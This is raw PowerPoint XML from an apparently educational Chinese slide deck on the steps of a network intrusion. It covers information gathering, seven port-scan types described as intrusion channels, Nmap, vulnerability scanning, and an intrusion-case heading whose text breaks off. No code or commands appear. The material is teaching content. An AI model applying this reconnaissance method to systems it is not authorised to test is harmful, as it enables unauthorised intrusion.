              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A09EC33-BD24-4877-B608-32E216214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844675"/>
            <a:ext cx="8424862"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3E24A252-12A0-4F41-B8CE-8ACF05B478C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="683567" y="5229200"/>
            <a:ext cx="2592289" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{119C70BD-ADB3-4D62-A8A0-6C353C98E9DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一步：获取信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68611" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF409C38-1A05-4F17-B52D-8D33F1DC0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263" y="1628775"/>
            <a:ext cx="8426450"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4237625-9C0E-4C18-975B-7A9802C42454}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="322263" y="5373216"/>
            <a:ext cx="3025601" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C0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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF0D3385-A5FB-4B2F-9B42-BF1D915A79E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第二步：端口扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{119B6478-943C-43C7-8BB8-6A2E2B734FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2246313"/>
            <a:ext cx="8001000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-22860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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>获取网络服务的端口作为入侵通道。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99EA4560-91CC-4284-B4D2-71FB05549717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4227513"/>
            <a:ext cx="8077200" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-22860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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>1.TCP Connect()		2.TCP SYN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>3.TCP FIN			4.IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>段扫瞄</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>5.TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>反向</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Ident</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>扫瞄	</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>6.FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>代理扫瞄</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>7.UDP ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不到达扫瞄	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF53541-758D-4999-911F-E1D9663FA403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="3687763"/>
            <a:ext cx="2505075" cy="519112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="2400" b="1">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b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>种扫瞄类型：</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4E2B2C0-9207-4A08-AF90-3CABD41ADA28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187450" y="549275"/>
            <a:ext cx="6019800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>常见扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9C03C79-99AB-4580-874B-3C31C6F9A234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827088" y="2743200"/>
            <a:ext cx="7488237" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1066800" lvl="1" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>Fyodor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>编写</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>端口扫描、操作系统指纹识别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>集成了多种扫描技巧，提供的端口扫描功能比较全面，是目前国内外最为流行的端口扫描工具之一</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="楷体_GB2312"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="楷体_GB2312"/>
              <a:ea typeface="楷体_GB2312"/>
              <a:cs typeface="楷体_GB2312"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="楷体_GB2312"/>
                <a:ea typeface="楷体_GB2312"/>
                <a:cs typeface="楷体_GB2312"/>
              </a:rPr>
              <a:t>没有扫描漏洞的功能，无法对目标主机的脆弱性进行深入挖掘。</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B730B8F5-EFF7-4482-9527-AF27518869D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187450" y="549275"/>
            <a:ext cx="6019800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>常见扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71683" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{072AA3E6-9564-4AD8-BF1F-014161911F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85763"/>
            <a:ext cx="7620000"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图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0727D0D-1E21-42DB-A259-A8C04D16E9E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5411788"/>
            <a:ext cx="37433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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2A70990-195F-4D9E-B1E3-5915E4953FF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第三步：漏洞发现与扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A8BE912-ACBA-44F2-9E6E-E57B6E0515E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1166813" y="2565400"/>
            <a:ext cx="7086600" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>发现操作系统、系统软件、常见应用软件、数据库存在的漏洞，提供解决方案。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>双刃剑</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54A9160-CDBE-456D-92ED-C7AE6E4D4836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵案例一</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C128966F-E665-4F8C-AC4A-696DBE43EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971549" y="1844675"/>
            <a:ext cx="7972425" cy="4752677"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
